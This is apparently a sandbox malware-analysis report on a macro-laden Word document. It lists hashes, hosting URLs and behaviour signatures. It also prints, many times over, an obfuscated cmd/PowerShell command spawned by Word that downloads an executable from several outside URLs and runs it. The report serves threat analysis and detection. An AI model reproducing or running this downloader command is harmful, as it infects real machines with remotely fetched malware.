Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type:...

24
Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code pag File size: 138.38 KB (141696 bytes) Compile time: 0000-00-00 00:00:00 MD5: 69ab527b47f1017ff452b3570bfc03ff SHA1: c3a6e7d66d746b03d0557e8ed5d43259c093d937 Submitted: 2019-01-27 02:54:04 URL(s) file hosting http://milagro.com.co/Clients_information/2019-01/ http://www.milagro.com.co/Clients_information/2019-01/ Antivirus Report Report date Detection Ratio Permalink 2019-01-18 17:31:05 39/60 13 Behaviors detected by system signatures The office file created a suspicious child process. - Processes: WINWORD.EXE -> cmd.exe -> cmd.exe The office file has 2 macros. - content: The file appears to have no content. Martian Subprocess Started By Office Process - office_martian: c:\windows\sysnative\cmd.exe Page 1 Date: 2020-05-24 16:33:21

Transcript of Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type:...

Page 1: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

2019-01

MalScore: 100

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 12:09:00 2019, Last Saved Time/Date

File size: 138.38 KB (141696 bytes)

Compile time: 0000-00-00 00:00:00

MD5: 69ab527b47f1017ff452b3570bfc03ff

SHA1: c3a6e7d66d746b03d0557e8ed5d43259c093d937

Submitted: 2019-01-27 02:54:04

URL(s) file hosting

http://milagro.com.co/Clients_information/2019-01/

http://www.milagro.com.co/Clients_information/2019-01/

Antivirus Report

Report date Detection Ratio Permalink

2019-01-18 17:31:05 39/60

13 Behaviors detected by system signatures

The office file created a suspicious child process.

- Processes: WINWORD.EXE -> cmd.exe -> cmd.exe

The office file has 2 macros.

- content: The file appears to have no content.

Martian Subprocess Started By Office Process

- office_martian: c:\windows\sysnative\cmd.exe

Page 1 Date: 2020-05-24 16:33:21

https://www.virustotal.com/file/442f8849750286ca1f0d5387fdeadc97b02d87cf54e063a10953ef6b76c47499/analysis/1547832665
Page 2: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- office_martian: c:\windows\sysnative\cmd.exe

Appears to use set to define variables in a command line likely for obfuscation

- command: "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2%/v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\sysnative\cmd.exe /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\system32\cmd.exe CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "

Appears to use character obfuscation in a command line

- command: "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2%

Page 2 Date: 2020-05-24 16:33:21

Page 3: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

/v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\sysnative\cmd.exe /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\system32\cmd.exe CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "

Uses Windows utilities for basic functionality

- command: "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2%/v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnen

Page 3 Date: 2020-05-24 16:33:21

Page 4: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

es.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2%/v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\sysnative\cmd.exe /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\sysnative\cmd.exe /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((

Page 4 Date: 2020-05-24 16:33:21

Page 5: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\system32\cmd.exe CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD " - command: C:\Windows\system32\cmd.exe CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD " - command: C:\Windows\system32\cmd.exe CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 